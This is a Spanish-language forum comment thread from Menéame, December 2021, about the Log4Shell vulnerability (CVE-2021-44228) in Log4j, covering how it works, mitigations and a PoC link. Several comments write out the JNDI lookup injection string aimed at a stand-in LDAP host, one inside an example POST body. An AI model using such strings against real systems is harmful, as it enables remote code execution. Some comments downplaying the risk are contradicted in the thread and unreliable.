Menéame: comentarios [3594248]

#79 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)

alvdavi — Mon, 13 Dec 2021 16:14:02 +0000

#77 Hola. Aunque es verdad que lo que describes era posible con antiguas versiones de OpenJDK, ese no es el caso en versiones de OpenJDK desde hace varios años, y otras alternativas tienen que ser utilizadas

» autor: alvdavi

#78 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)

mre13185 — Mon, 13 Dec 2021 13:31:56 +0000

#69 No, ya la probé en su día y era muy engorroso, así que uso la que viene por defecto, logback.

» autor: mre13185

#77 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)

EmuAGR — Mon, 13 Dec 2021 11:31:47 +0000

#75 Ejecuta una clase que se baja de un servidor LDAP. Los programadores en Java están obsesionados con las RPC en vez de usar APIs. Si total, el rendimiento no es lo mejor de Java...

» autor: EmuAGR

#76 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)

alvdavi — Mon, 13 Dec 2021 07:38:11 +0000

Dudo que quede alguien leyendo por aqui, pero esta es una herramienta publicada por el equipo de AWS Corretto (del que formo parte) que permite parchear esta vulnerabilidad en caliente, sin reiniciar la maquina virtual de java:
github.com/corretto/hotpatch-for-apache-log4j2

» autor: alvdavi

#75 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)

Razhan — Mon, 13 Dec 2021 07:33:45 +0000

#73 No, log4j no ejecuta lo que se ha logeado. Log4j no tiene algo tipo ${exec:<my_command>}, esta vulnerabilidad es grave, pero no es tan clara.

» autor: Razhan

#74 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)

Razhan — Mon, 13 Dec 2021 07:31:38 +0000

#72 Esta vulnerabilidad consta de dos partes. Una de ellas es lo que Alvaro presento en 2016, pero por si sola no es suficiente. Su presentacion demostro que una injeccion de jndi se puede escalar hasta una ejecucion de codigo remoto. Pero todavia necesitas alguna forma de hacer que Java se conecte a tu servidor.

Log4j no solo lo hizo posible, sino que puede considerarse que lo hizo trivial

» autor: Razhan

#73 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)

EmuAGR — Sun, 12 Dec 2021 08:58:14 +0000

#72 No es lo mismo, la vulnerabilidad aquí no es exactamente la ejecución por LDAP, sino que el Log ejecuta lo que es logueado.

» autor: EmuAGR

#72 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)

PussyLover — Sat, 11 Dec 2021 23:49:50 +0000

Lo fuerte de todo esto es que en 2016, el español Álvaro Muñoz ya expuso esta vulnerabilidad en un Black Hat de 2016.

En este Tweet un pequeño vídeo de su presentación: twitter.com/HaboubiAnis/status/1469714216407998475

Y aquí el PDF con su presentación: blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP

» autor: PussyLover

#71 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)

PussyLover — Sat, 11 Dec 2021 23:48:07 +0000

github.com/apache/logging-log4j2/pull/608

» autor: PussyLover

#70 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)

--689577-- — Sat, 11 Dec 2021 22:08:27 +0000

#68 Mejor asumir que me explico realmente mal y dejarlo aquí.

» autor: --689577--

#69 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)

Razhan — Sat, 11 Dec 2021 16:12:09 +0000

#64 Slf4j es solo una api de logging, por debajo sigues necesitando tener una implementación. Si la implementación es log4j2, seguirías teniendo problemas

» autor: Razhan

#68 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)

--419859-- — Sat, 11 Dec 2021 13:32:35 +0000

#65 Todavía no veo en tus comentarios nada que no sean castillos en el aire, y nada que sea una alternativa real, por lo que asumiré que te explicas realmente mal.

» autor: --419859--

#67 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)

Mschumacher — Sat, 11 Dec 2021 13:03:57 +0000

#45 pero digo que no es relevante el sistema operativo, es una librería de Java

» autor: Mschumacher

#66 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)

--94561-- — Sat, 11 Dec 2021 11:36:00 +0000

#58 Tal cual. Lo peor es q estara en el repo

» autor: --94561--

#65 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)

--689577-- — Sat, 11 Dec 2021 10:44:11 +0000

#41 Bueno, por los comentarios que pones directamente asumes que soy tonto de remate o uno de esos del palillo en la boca que apenas ha conseguido programar algo en basic (uffff.... “print”.... ezo ke eeeeee!?!?). También denoto una cierta respuesta a la defensiva como si mi comentario fuera un ataque a las librerías/módulos/etc y no... por ahi no van los tiros sino que, al contrario, lo que pretendo comunicar (pobremente?...) con mi comentario es que hay que ponerse manos a la obra para crear una nueva solución, fusionando el hardware y software, que quite toda esta complejidad y por ende la mayoría de los vectores de ataque.

Hago este comentario basándome en más de 7 años de I+D en el más bajo nivel en el Kernel de Linux; mi mundo discurre en los uS (microsegundos), en la gestión avanzada de threads en el scheduler, en el control de frecuencias en multinucleo y en la optimización de la estrategia idle de cada núcleo entre otras cosas.
También me dedico al tema ML y soy perfectamente consciente que sin todas esas fantásticas librerías no podría programar de forma simple en los distintos lenguajes como por ejemplo python.

Espero no haber soltado un tostón y buen finde!

» autor: --689577--

#64 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)

mre13185 — Sat, 11 Dec 2021 09:07:54 +0000

#3 El caso es que Github hace unas semanas me saltó la alarma en una app, no sé si sería por esto. Como para estas cosas lo manejo con lombok y las llamadas a log las tengo centralizadas con una clase de utilidad no me costó mucho corregir la vulnerabilidad, sólo cambiar la anotación de @Log4j a @Slf4j en dicha clase.

» autor: mre13185

#63 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)

inovercy — Sat, 11 Dec 2021 08:45:15 +0000

#33 Es una biblioteca que provee de facilidades al programador para escribir logs de su aplicación, da igual la plataforma, windows, linux, mac o lo que sea. Estés programando lo que estés programando.

Luego hay un problema de concepto sobre qué es un servidor. Cuando hablas de servidor linux/windows (windows también tiene una versión para servidores) estás hablando de un servidor "fisico" que corre un SO. Pero también se llaman servidores a aplicaciones que escuchan peticiones de un cliente. Digamos que tú podrías tener un servidor windows/linux con varias aplicaciones de tipo servidor corriendo dentro de este. Por ejemplo un servidor de base de datos (SQLServer corre en windows, por ejemplo) y muchos de estos servidores son susceptibles de usar log4j, independientemente del SO donde corran.

» autor: inovercy

#62 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)

warheart — Sat, 11 Dec 2021 08:33:12 +0000

#43 #42 no sé si habéis entendido bien la vulnerabilidad. El problema es que tú puedes tener un servicio REST expuesto (127.0.0.1/servicio/p) que recibe un parámetro p y hace un log.error("El parámetro " + p + " no es válido");

Si en ese parámetro alguien manda la cadena del exploit, explota la vulnerabilidad. En el primer enlace de #3 se ve perfectamente.

» autor: warheart

#61 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)

--453660-- — Sat, 11 Dec 2021 08:01:47 +0000

#40 es que no debería haber nada de Java de cara en partes públicas de sistemas distribuidos. Es un lenguaje backend y precisamente tener MVCs y monolitos expone a todo un mundo de vulnerabilidades.

Pero sí, estoy de acuerdo con lo que dices y no hay que dejar ningún frente abierto.

» autor: --453660--

#60 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)

Razhan — Sat, 11 Dec 2021 02:51:50 +0000

#16 Si, el jueves, se publico ayer. Algunos llevamos mas de 24 horas con esto

» autor: Razhan

#59 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)

Razhan — Sat, 11 Dec 2021 02:48:12 +0000

#18 No voy a mentar el nivel de dolor

» autor: Razhan

#58 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)

EmuAGR — Sat, 11 Dec 2021 02:34:48 +0000

#51 Ahora a ver quién ha sido el genio de meter todas esas tontopolladas a log4j.

» autor: EmuAGR

#57 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)

EmuAGR — Sat, 11 Dec 2021 02:28:37 +0000

#26 Anda que ejecutar código que le pasan por LDAP... Cuánta chorrada meten en ciertas librerías. Es como si alguna agencia de inteligencia hubiera tenido la idea de contribuir alguna estupidez.

» autor: EmuAGR

#56 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)

alvdavi — Sat, 11 Dec 2021 02:20:01 +0000

#55 No recomendaria a nadie intentar determinar si estas afectado o no por este problema analizando el comportamiento de tu aplicacion y lo que intenta guardar en los logs. Personalmente recomendaria aquellos utilizando log4j2 que asuman que estan afectados y actualizen

» autor: alvdavi

#55 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)

--94561-- — Sat, 11 Dec 2021 02:10:42 +0000

#54 Que la movida es que te pueden mandar una peticion en la que figure ese texto asi formado, no?

"${jndi:ldap://jaja.equisde.tevoyapetarelkakas.com/miraquerisas}"

Para que el jodio log4j se lo coma

Ejemplo:

POST mipagina.com/user

A la que se le pasa de body

{ "user": "${jndi:ldap://jaja.equisde.tevoyapetarelkakas.com/miraquerisas}", email="ostiatu@tetemail.com"}

Y como se te ocurra logear el user estas jodido....

BOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOM

» autor: --94561--

#54 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)

alvdavi — Sat, 11 Dec 2021 02:04:48 +0000

#35 No es necesaria ninguna accion especialmente extraña con Log4j2 para estar afectado por este problema. Si utilizas log4j2, asume que estas afectado por este problema (porque casi seguro, lo estas). La unica opcion es actualizar log4j2 a 2.15+

» autor: alvdavi

#53 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)

alvdavi — Sat, 11 Dec 2021 02:02:01 +0000

#46 Hola,

Tu mensaje no es correcto. El fallo de log4j2 es critico, y en muchas ocasiones puede utilizarse independientemente de la version de OpenJDK en la que esta corriendo log4j2. La unica opción segura es actualizar Log4j2

» autor: alvdavi

#52 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)

alvdavi — Sat, 11 Dec 2021 01:58:31 +0000

#25 Correcto. Esta vulnerabilidad debe seguir considerandose critica y requiere una actualizacion de Log4j2.

» autor: alvdavi

#51 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)

--94561-- — Sat, 11 Dec 2021 01:58:12 +0000

#49 #39 vale, espera!!!!

Que no que no!!!!!

Que es que el mismo atacante te manda la cadena de texto (pongamos en el username cuando alguien va a loguearse o darse de alta en la applicacion, por ejemplo) "${jndi:ldap://dasdafdafs}" y coge el tontopollas del log4j y se pone a llamar a la pagina y a deserializar la respuesta y le enchufan una class que explota la vulnerabilidad mitica del deserializado y puede ejecutar lo que quiera con permisos de quien haya lanzado el servidor....

LOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOL

Como pueden hacer un CAGADON de ese tamaño en una puta libreria que SOLO TIENE QUE LOGUEAR, JODER

» autor: --94561--

#50 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)

alvdavi — Sat, 11 Dec 2021 01:56:58 +0000

#17 El uso de una version mas nueva de OpenJDK (ya sea en referencia a jdk8u121, jdk8u191 o 11.0.1) provee unicamente de una mitigacion parcial del problema. En muchas circunstancias, sigue siendo posible explotar la vulnerabilidad utilizando otras alternativas.

Esta vulnerabilidad debe considerarse critica independientemente de que version de OpenJDK se esta utilizando. La unica opcion para evitar el problema es actualizar Log4j2 a la ultiva version de 2.15 disponible (2.15rc2 en el momento de escribir este mensaje)

» autor: alvdavi

#49 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)

--94561-- — Sat, 11 Dec 2021 01:50:05 +0000

#39 A ver, que creo que estoy perdiendome algo, por que sino no seria tan grave:

Generalmente guardaras la respuesta en algun sitio porque la querras para algo mas que logearla, no se la das directamente a un log, y el problema solo ocurre cuando el deserializado lo hace log4j2, no?

Y cuando la recojas para hacer algo con ella la desearilazas a un objeto (de la clase que sea) y ya no lo tendra que hacer log4j2, no? Le daras ese objeto ya parseado a log4j....

Insisto, creo que lo he entendido mal, pero no se QUE he entendido mal.

» autor: --94561--

#48 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)

la_gusa — Sat, 11 Dec 2021 01:30:29 +0000

#42 la inyección de clases en tiempo de ejecución es más viejo que el cagar y funciona de puta madre. Es lo que hizo Spring tan popular

» autor: la_gusa

#47 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)

herlocksholmes — Fri, 10 Dec 2021 23:07:33 +0000

No entiendo nada de lo que habláis.
Os odio a todos

» autor: herlocksholmes

#46 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)

respira — Fri, 10 Dec 2021 23:01:31 +0000

A ver, que si, que es un 0day y la cosa es grave... Pero esta noticia es bastante alarmista. Si usas una java6 medianamente actualizada no estas afectado por la vulnerabilidad "J A V A 6"... Esto significa que tan solo las personas que usen una versión de antes de 2004 o no hayan actualizado están jodidas. Y obviamente NO es fácil de explotar.

Vamos que log4j tiene un fallo muy grave y sin embargo java lo cubre bastante bien para que explotarla sea bastante más difícil de lo que ya es...

¿Esto es el salvame delux de la programación?

» autor: respira

#45 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)

raul_lapeira — Fri, 10 Dec 2021 22:53:27 +0000

#31 ... coño y que llevo haciendo 20 años! . Servidores con Java.

» autor: raul_lapeira

#44 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)

raul_lapeira — Fri, 10 Dec 2021 22:52:11 +0000

#38 Tienes que tener acceso al JDNI que tiene la clase que quiere hacer pupa... para los usuarios de windows en local sí es un problema, pero en la mayoria de redes corporativas que se me ocurren no seria viable este tipo de ataque segun está hecho en la POC.

» autor: raul_lapeira

#43 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)

raul_lapeira — Fri, 10 Dec 2021 22:50:10 +0000

#42 Pero tios... tambien tienes que secuestrar un JNDI accesible para la JVM donde corra la app donde inyectas la cadena... esto no es tan noticiable ni de lejos, cosas peores tuvieron mucha menos prensa.

» autor: raul_lapeira

#42 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)

raul_lapeira — Fri, 10 Dec 2021 22:29:32 +0000

#3 hombre... Esta haciendo un jndi a traves de un logging... Wtf xxdd. Hay que mirar el codigo fuente de esto... Muy legendario.

Todo el tema de la inyeccion de clases en tiempo de ejecucion que suena muy hipster no deja de ser una gilipollez en sistemas corporativos tipicos.

Vivimos la era del fashion oriented programming y vaya si se nota.

» autor: raul_lapeira

#41 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)

--419859-- — Fri, 10 Dec 2021 22:25:31 +0000

#13 ¿Y cual propones?, ¿dejar de usar módulos de terceros y hacerlo todo desde 0?, ¿mini aplicaciones gestionadas por "equipos" de dos personas? Me imagino que el log de lo que haces va a la consola, y con suerte a un fichero, a base de "print" o equivalente en tu código. Super granular, escalable y nada complicado de usar cuando tienes unos cuantos cientos de miles de líneas de código.

» autor: --419859--

#40 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)

--419859-- — Fri, 10 Dec 2021 22:20:48 +0000

#19 Pon un proxy en lugar de parchear, verás que divertido ...

» autor: --419859--

#39 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)

drnth — Fri, 10 Dec 2021 22:06:01 +0000

#35 Imagina que tienes un punto de entrada a tu aplicación (suscripción a una cola, un controlador rest, un socket, etc.) y estás guardando trazas de lo que recibes por ahí para poder diagnosticar posibles problemas... No es tan raro, ¿no?

» autor: drnth

#38 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)

el-brujo — Fri, 10 Dec 2021 21:44:51 +0000

#14 isc.sans.edu/diary/28120

» autor: el-brujo

#37 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)

snowdenknows — Fri, 10 Dec 2021 21:35:52 +0000

#4 prácticamente todo lo que usa java, usa log4j, si no es la propia aplicación alguna librería que usan

» autor: snowdenknows

#36 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)

alpoza — Fri, 10 Dec 2021 21:16:32 +0000

#5 este no falla

» autor: alpoza

#35 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)

--94561-- — Fri, 10 Dec 2021 21:04:40 +0000

Pero a ver si lo entiendo:

La vulnerabilidad es cuando logueas, directamente, el resultado de una llamada a un LDAP pq lo deserializa in java's way?

Pero quien loguea eso? Por que?

» autor: --94561--

#34 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)

Emosido_engañado — Fri, 10 Dec 2021 20:59:24 +0000

Una vulnerabilidad zero day, nivel 10/10 y un viernes. El hijoputismo no tiene fronteras. Ya puede arder el mundo que mañana me toco los cojones.

» autor: Emosido_engañado

#33 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)

Mutiko30 — Fri, 10 Dec 2021 20:58:53 +0000

#31 no tengo ni idea.. he leído algo de apache y he asumido que era un tema de servidores

» autor: Mutiko30

#32 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)

--419859-- — Fri, 10 Dec 2021 20:53:49 +0000

#17 ¿Que no funcioni?, ¿versiones actualizadas?

» autor: --419859--

#31 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)

Mschumacher — Fri, 10 Dec 2021 20:43:27 +0000

#28 pero que servidores? Es una librería de Java

» autor: Mschumacher

#30 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)

Mutiko30 — Fri, 10 Dec 2021 20:37:31 +0000

#20 ventanas, ventanas traigo.. y pingüinos, pinguinitos también traigo.

» autor: Mutiko30

#29 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)

omegapoint — Fri, 10 Dec 2021 20:37:17 +0000

#4 yo mismo, no dire donde, pero... mierda!

» autor: omegapoint

#28 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)

Mutiko30 — Fri, 10 Dec 2021 20:37:12 +0000

#22 Que a mi me la suda.. pero ni una palabra de los S.O afectados en servidores.. hay lo dejo.

» autor: Mutiko30

#27 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)

omegapoint — Fri, 10 Dec 2021 20:36:54 +0000

#3 ohhhh mierda mierda mierda!!!!

» autor: omegapoint

#26 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)

todosube — Fri, 10 Dec 2021 20:36:10 +0000

#4 Pues diría que es la librería para logging más utilizada en Java

» autor: todosube

#25 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)

Polmac — Fri, 10 Dec 2021 20:34:11 +0000

#17 Con esas versiones, si lo he entendido bien, no funciona uno de los vectores de ataque; pero no es el único…

» autor: Polmac

#24 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)

EmuAGR — Fri, 10 Dec 2021 20:30:40 +0000

#11 Bueno, de ahí a que todo esté parcheado...

» autor: EmuAGR

#23 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)

analphabet — Fri, 10 Dec 2021 20:20:52 +0000

#14 en #3 tienes el poc

Y básicamente esta imagen lo resume todo user-images.githubusercontent.com/45926593/145425339-47c71230-87d2-451

» autor: analphabet

#22 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)

zeekren — Fri, 10 Dec 2021 20:20:39 +0000

#15 log4j se usa un huevo en Windows, no es por nada...

» autor: zeekren

#21 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)

manolito_pajotas — Fri, 10 Dec 2021 20:03:44 +0000

Y seguro que es culpa de VOX

» autor: manolito_pajotas

#20 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)

borteixo — Fri, 10 Dec 2021 19:48:47 +0000

#15 manzanas traigo

» autor: borteixo

#19 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)

--453660-- — Fri, 10 Dec 2021 19:44:02 +0000

#17 es que eso es lo suyo, tener whitelisting en vez de blacklisting, network policies lo más restrictivas posibles y la parte pública ponerla a través de proxies que oculten las llamadas internas.

» autor: --453660--

#18 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)

skylon — Fri, 10 Dec 2021 19:43:30 +0000

#2 no lo sabes tú bien

» autor: skylon

#17 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)

Overmind — Fri, 10 Dec 2021 19:35:54 +0000

Aunque es grave, es posible que finalmente el ataque no funcione en muchos servidores
Parece que con un JDK algo actualizado ya no funciona (por ejemplo, para Java 8, desde la 191 ya no funcionaría).
Por otra parte muchos servidores tienen las conexiones salientes capadas, por lo que ahí tampoco funcionaría el ataque.

» autor: Overmind

#16 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)

--453660-- — Fri, 10 Dec 2021 19:34:43 +0000

Vaya huevos publicar una vulnerabilidad grave un viernes por la tarde. No tenían otro dia de la semana, no...

» autor: --453660--

#15 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)

Mutiko30 — Fri, 10 Dec 2021 19:33:19 +0000

Ok, es que Windows es un sistema malo, malo ,malo... Oh wait!

» autor: Mutiko30

#14 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)

--94561-- — Fri, 10 Dec 2021 19:25:39 +0000

No entiendo exactamente...

Hay alguna PoC por ahi?

» autor: --94561--

#13 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)

--689577-- — Fri, 10 Dec 2021 19:24:45 +0000

Demasiados componentes/librerías/módulos y demasiada complejidad... Toca hacer un cambio de paradigma de programación (Soft+Hard)...

» autor: --689577--

#12 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)

urannio — Fri, 10 Dec 2021 19:15:42 +0000

Solamente

» autor: urannio

#11 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)

ronko — Fri, 10 Dec 2021 19:07:43 +0000

#9 El launcher me manda este sitio para solucionarlo, la versión actual está parcheada ya: www.minecraft.net/es-es/article/important-message--security-vulnerabil

» autor: ronko

#10 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)

code2011 — Fri, 10 Dec 2021 19:06:54 +0000

Vaya día le ha dado la vulnerabilidad esta

» autor: code2011

#9 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)

EmuAGR — Fri, 10 Dec 2021 19:05:22 +0000

#4 Hay un montón de versiones de Minecraft vulnerables. Edit: Ahora he visto que era irónico...

» autor: EmuAGR

#8 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)

el-brujo — Fri, 10 Dec 2021 14:31:26 +0000

#7 ah jaja perdón, pensaba que el comentario iba en serio.

$(jndi):ldap:// en todas partes
o
$(jndi):rdmi://

» autor: el-brujo

#7 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)

insulabarataria — Fri, 10 Dec 2021 14:22:22 +0000

#6 estaba siendo irónico...

» autor: insulabarataria

#6 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)

el-brujo — Fri, 10 Dec 2021 14:00:55 +0000

#4 Los servicios en la nube como Steam, Apple iCloud y aplicaciones como Minecraft son vulnerables.

» autor: el-brujo

#5 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)

keiko_san — Fri, 10 Dec 2021 13:20:11 +0000

#4 Yo soy mas de system.out

» autor: keiko_san

#4 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)

insulabarataria — Fri, 10 Dec 2021 13:16:43 +0000

Bah, no creo que log4j se use mucho.

» autor: insulabarataria

#3 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)

el-brujo — Fri, 10 Dec 2021 13:05:35 +0000

CVE-2021-44228, "es grave " --> es muy grave, Gravedad CVSS 10 sobre 10 . No hay nada más grave.
Mitigaciones:
www.lunasec.io/docs/blog/log4j-zero-day/
PoC:
github.com/tangxiaofeng7/apache-log4j-poc
Web oficial:
logging.apache.org/log4j/2.x/security.html

» autor: el-brujo

#2 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)

dsj — Fri, 10 Dec 2021 13:02:07 +0000

Dolor mucho dolor ...

» autor: dsj

#1 Aviso de seguridad: Una nueva vulnerabilidad zero-day en la biblioteca Java Log4j ya está siendo explotada (en)

tiopio — Fri, 10 Dec 2021 12:43:25 +0000

Para más info: www.randori.com/blog/cve-2021-44228/

» autor: tiopio